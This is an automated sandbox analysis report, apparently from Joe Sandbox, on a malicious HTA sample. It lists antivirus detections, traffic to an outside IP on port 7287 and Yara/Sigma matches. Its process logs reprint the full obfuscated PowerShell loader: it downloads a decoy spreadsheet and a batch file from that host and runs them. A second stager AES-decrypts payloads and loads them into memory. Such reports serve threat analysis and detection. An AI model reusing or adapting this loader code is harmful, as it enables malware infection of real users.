+ '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRf
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7916, ProcessName: svchost.exe

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: hta.htaAvira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://193.222.96.114Virustotal: Detection: 10%Perma Link
Source: http://193.222.96.114:7287/jiteon.xlsxVirustotal: Detection: 15%Perma Link
Source: http://193.222.96.114:7287/GoGi.batVirustotal: Detection: 11%Perma Link
Source: http://193.222.96.11Virustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted file
Source: hta.htaVirustotal: Detection: 39%Perma Link
Source: hta.htaReversingLabs: Detection: 39%
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49755 version: TLS 1.2

Networking

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 7287
Source: unknownNetwork traffic detected: HTTP traffic on port 7287 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7287
Source: unknownNetwork traffic detected: HTTP traffic on port 7287 -> 49731
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 193.222.96.114:7287
Source: global trafficHTTP traffic detected: GET /jiteon.xlsx HTTP/1.1Host: 193.222.96.114:7287Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /GoGi.bat HTTP/1.1Host: 193.222.96.114:7287
Source: Joe Sandbox ViewIP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox ViewIP Address: 13.107.246.41 13.107.246.41
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: global trafficHTTP traffic detected: GET /rules/rule170012v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule63067v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /jiteon.xlsx HTTP/1.1Host: 193.222.96.114:7287Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /GoGi.bat HTTP/1.1Host: 193.222.96.114:7287
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.2
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.22
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.9
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.1
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.11
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:7
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:72
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:728
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1760006008.0000000005567000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:7287
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:7287/
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:7287/G
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:7287/Go
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:7287/GoG
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:7287/GoGi
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:7287/GoGi.
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:7287/GoGi.b
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:7287/GoGi.ba
Source: powershell.exe, 00000001.00000002.1760006008.00000000052C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:7287/GoGi.bat
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.222.96.114:7287/jiteon.xlsx
Source: svchost.exe, 0000000B.00000002.2966470735.000002AB2DCC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.3.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB33228000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB33228000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB33228000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB3325D000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.11.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1760006008.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1786540892.0000000004CC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.1786540892.0000000004C87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6LR
Source: powershell.exe, 00000001.00000002.1760006008.0000000004FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1786540892.0000000004CA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.11.dr, qmgr.db.11.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.11.dr, qmgr.db.11.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.11.dr, qmgr.db.11.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000001.00000002.1760006008.0000000005108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1769953589.000000000601C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000000B.00000003.1780699845.000002AB332D2000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.4:49755 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2066
Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2190
Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2066Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2190Jump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.troj.winHTA@22/17@0/3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\jiteon.xlsxJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whkbyoyv.adm.ps1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: hta.htaVirustotal: Detection: 39%
Source: hta.htaReversingLabs: Detection: 39%
Source: powershell.exeString found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\hta.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = 